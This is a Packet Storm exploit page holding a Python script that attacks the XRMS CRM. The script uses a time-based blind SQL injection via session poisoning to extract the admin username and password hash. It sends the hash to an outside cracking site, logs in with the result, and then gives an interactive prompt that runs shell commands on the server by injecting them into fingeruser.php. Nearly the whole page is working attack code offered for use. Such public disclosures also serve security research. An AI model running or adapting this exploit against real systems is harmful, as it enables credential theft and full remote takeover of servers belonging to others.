exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XRMS Blind SQL Injection / Command Execution

XRMS Blind SQL Injection / Command Execution
Posted Aug 28, 2014
Authored by Benjamin Harris

XRMS blind SQL injection exploit that leverages $_SESSION poisoning and achieves remote command execution.

tags | exploit, remote, sql injection
SHA-256 | 22da305ed8f31ea31597071bebb8862e1bbef05d26a2868faaa7c5cd07486cbe

XRMS Blind SQL Injection / Command Execution

Change Mirror Download
#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################

import urllib
import urllib2
import time
import sys

usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
print """ ____
/ __/_ ______ _ _ ___________ ___ _____
/ /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
/ __/ /_/ / /_/ / _> </ / / / / / / (__ )
/_/ \__,_/\__, (_)_/|_/_/ /_/ /_/ /_/____/
/_/
[+] fuq th3 w0rld, fuq ur m0m!\n"""

def usage():
print " [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
print " [+] Example:"
print " [+] python " + sys.argv[0] + " domain.to/xrms"
quit()

def sendhashaway(hash):
print " [+] Sending hash to icrackhash.com to be cracked."
data = None
headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
gh = urllib2.Request(url,data,headers)
gh2 = urllib2.urlopen(gh)
output = gh2.read()
plaintext = getpositions(output,'<td><small><strong>','</strong>')
print " [-] Plaintext of hash: " +plaintext + "\n"
return plaintext

def username(length):
length = length + 1
duser = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
duser.append(usercharac[f])
found = 1
return duser

def getusernamelength():
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
while (found != 1):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Length found at position: " + str(i)
found = 1
length = i
return length
i = i + 1

def password(length):
length = length + 1
dpassword = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
dpassword.append(usercharac[f])
found = 1
return dpassword

def login(domain,user,password):
cookie = "XRMS=iseeurgettinown4d"
url = 'http://'+domain+'/login-2.php'
headers = { 'Cookie' : cookie }
data = urllib.urlencode([('username',user),('password',password)])
a1 = urllib2.Request(url,data,headers)
a2 = urllib2.urlopen(a1)
output = a2.read()
if output.find('PEAR.php') > 0:
print " [+] Logged In"

def commandexec(domain,command):
cookie = "XRMS=iseeurgettinown4d"
cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
headers = { 'Cookie' : cookie }
data = None
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
b1 = urllib2.Request(url,data,headers)
b2 = urllib2.urlopen(a1)
output = b2.read()
first = output.find('0x41') + 4
last = output.find('14x0') - 4
return output[first:last]

banner()
if len(sys.argv) < 2:
usage()
domain = sys.argv[1]
print " [+] Grabbing username length"
length = getusernamelength()
print " [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print " [+] Grabbing password hash"
tmppass = password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print " [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
cmd = raw_input(' [+] Run a command: ')
if cmd == 'quit':
print " [-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print " [+] "+ commandexec(domain,cmd)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close